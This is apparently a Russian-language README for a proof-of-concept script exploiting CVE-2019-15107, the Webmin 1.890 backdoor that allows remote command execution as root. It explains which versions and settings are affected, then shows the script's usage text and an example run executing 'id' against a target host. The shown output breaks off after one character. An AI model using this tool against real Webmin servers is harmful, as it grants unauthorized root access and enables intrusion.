
Эксплойт CVE-2019-15107
Вебмин версии 1.890 был выпущен с бэкдором, который позволял любому, кто знал о нём, выполнять команды с правами root. Версии с 1.900 по 1.920 также содержали бэкдор с похожим кодом, но он не был эксплуатируемым в стандартной установке Webmin. Только если администратор включил функцию в Webmin -> Webmin Configuration -> Authentication, разрешающую изменение истёкших паролей, атакующий мог ею воспользоваться.
вам понадобится pip3, чтобы установить эти пакеты.
$ python3 Webmin_exploit.py --help
usage: Webmin_exploit.py [-h] -host IP [-port Port] [-cmd Command]
Webmin 1.890 expired Remote Root POC
optional arguments:
-h, --help show this help message and exit
-host IP Host to attack
-port Port Port of the host ~ 10000 is Default
-cmd Command Command to execute ~ id is Default
python3 Webmin_exploit.py -host target -port 10000 -cmd id
$ python3 Webmin_exploit.py -host target -port 10000 -cmd id
[